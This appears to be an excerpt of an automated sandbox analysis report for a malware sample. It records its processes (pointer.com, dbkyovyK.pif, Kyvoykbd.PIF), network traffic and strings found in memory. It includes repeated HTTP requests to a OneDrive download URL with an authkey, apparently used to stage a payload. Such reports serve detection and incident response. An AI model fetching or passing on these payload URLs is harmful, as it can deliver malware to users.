Source: Joe Sandbox View	ASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
Source: Joe Sandbox View	ASN Name: THEZONEBG THEZONEBG

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: GET /download?resid=BF523B4A9B64BC6C%21135&authkey=!AJFtRaE0WfJwO6E HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=BF523B4A9B64BC6C%21135&authkey=!AJFtRaE0WfJwO6E HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=BF523B4A9B64BC6C%21135&authkey=!AJFtRaE0WfJwO6E HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\Public\Libraries\dbkyovyK.pif

Code function: 14_2_004066A8 setsockopt,recv,recv,

14_2_004066A8

Source: global traffic	HTTP traffic detected: GET /download?resid=BF523B4A9B64BC6C%21135&authkey=!AJFtRaE0WfJwO6E HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=BF523B4A9B64BC6C%21135&authkey=!AJFtRaE0WfJwO6E HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=BF523B4A9B64BC6C%21135&authkey=!AJFtRaE0WfJwO6E HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com

Source: unknown

DNS traffic detected: queries for: onedrive.live.com

Source: pointer.com, 00000008.00000003.1689587889.000000007EE90000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1721877253.0000000011390000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725576300.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000003.1693260679.0000000012434000.00000004.00000020.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1723986250.0000000012303000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000001.1696850208.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 00000019.00000001.1834966037.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1918637421.0000000000710000.00000040.00000400.00020000.00000000.sdmp, truesight.sys.8.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: pointer.com, 00000008.00000003.1689587889.000000007EE90000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1721877253.0000000011390000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725576300.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000003.1693260679.0000000012434000.00000004.00000020.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1723986250.0000000012303000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000001.1696850208.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 00000019.00000001.1834966037.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1918637421.0000000000710000.00000040.00000400.00020000.00000000.sdmp, truesight.sys.8.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: pointer.com, 00000008.00000003.1689587889.000000007EE90000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1721877253.0000000011390000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725576300.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000003.1693260679.0000000012434000.00000004.00000020.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1723986250.0000000012303000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000001.1696850208.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 00000019.00000001.1834966037.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1918637421.0000000000710000.00000040.00000400.00020000.00000000.sdmp, truesight.sys.8.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: pointer.com, 00000008.00000003.1689587889.000000007EE90000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1721877253.0000000011390000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725576300.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000003.1693260679.0000000012434000.00000004.00000020.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1723986250.0000000012303000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000001.1696850208.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 00000019.00000001.1834966037.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1918637421.0000000000710000.00000040.00000400.00020000.00000000.sdmp, truesight.sys.8.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: pointer.com, 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000003.1695608530.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725155820.0000000012645000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000003.1695215614.0000000012A71000.00000004.00000020.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1723986250.0000000012303000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1706456681.0000000002C10000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000002.2905399025.0000000034B5E000.00000004.00000020.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000002.2903919561.0000000031E8A000.00000004.00000020.00020000.00000000.sdmp, Kyvoykbd.PIF, 0000001A.00000002.1906314085.0000000002C5C000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1936537940.0000000025FDA000.00000004.00000020.00020000.00000000.sdmp, dbkyovyK.pif.8.dr	String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: pointer.com, 00000008.00000003.1689587889.000000007EE90000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1721877253.0000000011390000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725576300.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000003.1693260679.0000000012434000.00000004.00000020.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1723986250.0000000012303000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000001.1696850208.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 00000019.00000001.1834966037.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1918637421.0000000000710000.00000040.00000400.00020000.00000000.sdmp, truesight.sys.8.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: pointer.com, 00000008.00000003.1689587889.000000007EE90000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1721877253.0000000011390000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725576300.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000003.1693260679.0000000012434000.00000004.00000020.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1723986250.0000000012303000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000001.1696850208.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 00000019.00000001.1834966037.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1918637421.0000000000710000.00000040.00000400.00020000.00000000.sdmp, truesight.sys.8.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: pointer.com, 00000008.00000003.1689587889.000000007EE90000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1721877253.0000000011390000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725576300.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000003.1693260679.0000000012434000.00000004.00000020.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1723986250.0000000012303000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000001.1696850208.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 00000019.00000001.1834966037.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1918637421.0000000000710000.00000040.00000400.00020000.00000000.sdmp, truesight.sys.8.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: pointer.com, 00000008.00000003.1689587889.000000007EE90000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1721877253.0000000011390000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725576300.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000003.1693260679.0000000012434000.00000004.00000020.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1723986250.0000000012303000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000001.1696850208.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 00000019.00000001.1834966037.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1918637421.0000000000710000.00000040.00000400.00020000.00000000.sdmp, truesight.sys.8.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: pointer.com, 00000008.00000003.1689587889.000000007EE90000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1721877253.0000000011390000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725576300.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000003.1693260679.0000000012434000.00000004.00000020.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1723986250.0000000012303000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000001.1696850208.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 00000019.00000001.1834966037.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1918637421.0000000000710000.00000040.00000400.00020000.00000000.sdmp, truesight.sys.8.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: pointer.com, 00000008.00000003.1689587889.000000007EE90000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1721877253.0000000011390000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725576300.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000003.1693260679.0000000012434000.00000004.00000020.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1723986250.0000000012303000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000001.1696850208.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 00000019.00000001.1834966037.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1918637421.0000000000710000.00000040.00000400.00020000.00000000.sdmp, truesight.sys.8.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: pointer.com, 00000008.00000003.1689587889.000000007EE90000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1721877253.0000000011390000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725576300.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000003.1693260679.0000000012434000.00000004.00000020.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1723986250.0000000012303000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000001.1696850208.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 00000019.00000001.1834966037.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1918637421.0000000000710000.00000040.00000400.00020000.00000000.sdmp, truesight.sys.8.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: certutil.exe, 00000003.00000003.1637088713.000002599966D000.00000004.00000020.00020000.00000000.sdmp, pointer.com, 00000008.00000000.1646787400.0000000000451000.00000008.00000001.01000000.00000004.sdmp, pointer.com, 00000008.00000002.1702806735.0000000002890000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000003.1691476533.000000007EB40000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000003.1690060768.00000000122F3000.00000004.00000020.00020000.00000000.sdmp, pointer.com.3.dr, Kyvoykbd.PIF.8.dr	String found in binary or memory: http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/
Source: pointer.com, 00000008.00000003.1689587889.000000007EE90000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1721877253.0000000011390000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725576300.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000003.1693260679.0000000012434000.00000004.00000020.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1723986250.0000000012303000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000001.1696850208.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 00000019.00000001.1834966037.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1918637421.0000000000710000.00000040.00000400.00020000.00000000.sdmp, truesight.sys.8.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: pointer.com, 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000003.1695608530.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725155820.0000000012645000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000003.1695215614.0000000012A71000.00000004.00000020.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1723986250.0000000012303000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1706456681.0000000002C10000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000002.2905399025.0000000034B5E000.00000004.00000020.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000002.2903919561.0000000031E8A000.00000004.00000020.00020000.00000000.sdmp, Kyvoykbd.PIF, 0000001A.00000002.1907480971.0000000002EE9000.00000004.00001000.00020000.00000000.sdmp, Kyvoykbd.PIF, 0000001A.00000002.1906314085.0000000002C5C000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1936537940.0000000025FDA000.00000004.00000020.00020000.00000000.sdmp, dbkyovyK.pif.8.dr	String found in binary or memory: http://ocsp.comodoca.com0$
Source: pointer.com, 00000008.00000003.1689587889.000000007EE90000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1721877253.0000000011390000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725576300.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000003.1693260679.0000000012434000.00000004.00000020.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1723986250.0000000012303000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000001.1696850208.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 00000019.00000001.1834966037.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1918637421.0000000000710000.00000040.00000400.00020000.00000000.sdmp, truesight.sys.8.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: pointer.com, 00000008.00000003.1689587889.000000007EE90000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1721877253.0000000011390000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725576300.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000003.1693260679.0000000012434000.00000004.00000020.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1723986250.0000000012303000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000001.1696850208.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 00000019.00000001.1834966037.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1918637421.0000000000710000.00000040.00000400.00020000.00000000.sdmp, truesight.sys.8.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: pointer.com, 00000008.00000003.1689587889.000000007EE90000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1721877253.0000000011390000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725576300.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000003.1693260679.0000000012434000.00000004.00000020.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1723986250.0000000012303000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000001.1696850208.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 00000019.00000001.1834966037.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1918637421.0000000000710000.00000040.00000400.00020000.00000000.sdmp, truesight.sys.8.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: pointer.com, 00000008.00000003.1689587889.000000007EE90000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1721877253.0000000011390000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725576300.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000003.1693260679.0000000012434000.00000004.00000020.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1723986250.0000000012303000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000001.1696850208.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 00000019.00000001.1834966037.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1918637421.0000000000710000.00000040.00000400.00020000.00000000.sdmp, truesight.sys.8.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: pointer.com, 00000008.00000003.1689587889.000000007EE90000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1721877253.0000000011390000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725576300.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000003.1693260679.0000000012434000.00000004.00000020.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1723986250.0000000012303000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000001.1696850208.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 00000019.00000001.1834966037.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1918637421.0000000000710000.00000040.00000400.00020000.00000000.sdmp, truesight.sys.8.dr	String found in binary or memory: http://ocsp.sectigo.com0C
Source: pointer.com, 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000003.1695608530.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725427187.0000000012B1B000.00000004.00000020.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725155820.0000000012645000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000003.1695215614.0000000012A71000.00000004.00000020.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1723986250.0000000012303000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1706456681.0000000002C10000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000002.2905399025.0000000034B5E000.00000004.00000020.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000002.2903919561.0000000031E8A000.00000004.00000020.00020000.00000000.sdmp, Kyvoykbd.PIF, 0000001A.00000002.1907480971.0000000002EE9000.00000004.00001000.00020000.00000000.sdmp, Kyvoykbd.PIF, 0000001A.00000002.1906314085.0000000002C5C000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1936537940.0000000025FDA000.00000004.00000020.00020000.00000000.sdmp, dbkyovyK.pif.8.dr	String found in binary or memory: http://www.pmail.com0
Source: pointer.com, 00000008.00000002.1699425872.000000000076F000.00000004.00000020.00020000.00000000.sdmp, Kyvoykbd.PIF, 0000001A.00000003.1903375914.0000000000726000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://8rxyhq.am.files.1drv.com/
Source: Kyvoykbd.PIF, 00000017.00000003.1835151143.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://8rxyhq.am.files.1drv.com/p
Source: Kyvoykbd.PIF, 00000017.00000003.1835151143.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://8rxyhq.am.files.1drv.com/y4m6qczzBL-6Qgtp1_yGbwbc99ja1thGmpqx8uKxVY_xbxl3fkf2m3OFPmzYatw08dZ
Source: pointer.com, 00000008.00000002.1700601640.00000000007C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://8rxyhq.am.files.1drv.com/y4mAdmSw0kHlKdlZ_
Source: Kyvoykbd.PIF, 0000001A.00000003.1903375914.0000000000726000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://8rxyhq.am.files.1drv.com/y4mAdmSw0kHlKdlZ_V9zK5Rp4Inwn0d8s0sA90wD5LhatoPDxN7O8W4csICtjQFNHdL
Source: Kyvoykbd.PIF, 0000001A.00000003.1903375914.0000000000726000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://8rxyhq.am.files.1drv.com/y4mUAP1ymrBd-yTUK-CEq_HTtBVr8tWG7SWIhrccYhDE7W1JTuqN9h-qN3t2eBC5jBZ
Source: pointer.com, 00000008.00000002.1699425872.000000000076F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://8rxyhq.am.files.1drv.com/y4mfBiglz8YyU9V3b3twgGQe0LQySDhgpDCtOzTrQ45ntYAryOp4shjIaZZfsmf7IW7
Source: Kyvoykbd.PIF, 00000017.00000002.1836525497.0000000000819000.00000004.00000020.00020000.00000000.sdmp, Kyvoykbd.PIF, 00000017.00000003.1835151143.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://8rxyhq.am.files.1drv.com:443/y4m6qczzBL-6Qgtp1_yGbwbc99ja1thGmpqx8uKxVY_xbxl3fkf2m3OFPmzYatw
Source: Kyvoykbd.PIF, 0000001A.00000002.1904801201.0000000000767000.00000004.00000020.00020000.00000000.sdmp, Kyvoykbd.PIF, 0000001A.00000003.1903375914.0000000000726000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://8rxyhq.am.files.1drv.com:443/y4mUAP1ymrBd-yTUK-CEq_HTtBVr8tWG7SWIhrccYhDE7W1JTuqN9h-qN3t2eBC
Source: pointer.com, 00000008.00000002.1699425872.000000000076F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://8rxyhq.am.files.1drv.com:443/y4mfBiglz8YyU9V3b3twgGQe0LQySDhgpDCtOzTrQ45ntYAryOp4shjIaZZfsmf
Source: dbkyovyK.pif	String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeper
Source: pointer.com, 00000008.00000002.1723986250.00000000123C8000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000003.1696692635.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725155820.0000000012645000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000001.1696850208.000000000041A000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000003.1719337894.000000002FDF6000.00000004.00000020.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000003.1719205642.000000002FDE6000.00000004.00000020.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000003.1719249332.000000002FDF6000.00000004.00000020.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000003.1719205642.000000002FDEE000.00000004.00000020.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000003.1719410904.000000002FDE2000.00000004.00000020.00020000.00000000.sdmp, Kyvoykbd.PIF, 00000017.00000002.1846860261.00000000123A7000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 00000019.00000001.1834966037.0000000000400000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1918637421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000001.1902763804.0000000000400000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
Source: Kyvoykbd.PIF, 00000017.00000003.1835151143.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://live.com/
Source: pointer.com, 00000008.00000002.1699425872.000000000076F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://live.com/BpR3C
Source: Kyvoykbd.PIF, 0000001A.00000002.1904801201.0000000000767000.00000004.00000020.00020000.00000000.sdmp, Kyvoykbd.PIF, 0000001A.00000003.1903375914.0000000000726000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://live.com/on
Source: pointer.com, 00000008.00000002.1699425872.00000000006EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/
Source: Kyvoykbd.PIF, 00000017.00000003.1835151143.000000000076C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/-
Source: Kyvoykbd.PIF, 0000001A.00000003.1903375914.00000000006E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/download?resid=BF523B4A9B64BC6C%21135&authkey=
Source: Kyvoykbd.PIF, 0000001A.00000003.1903375914.00000000006AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/u
Source: pointer.com, 00000008.00000003.1689587889.000000007EE90000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1721877253.0000000011390000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725576300.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000003.1693260679.0000000012434000.00000004.00000020.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1723986250.0000000012303000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000001.1696850208.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 00000019.00000001.1834966037.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1918637421.0000000000710000.00000040.00000400.00020000.00000000.sdmp, truesight.sys.8.dr	String found in binary or memory: https://sectigo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49730 version: TLS 1.2
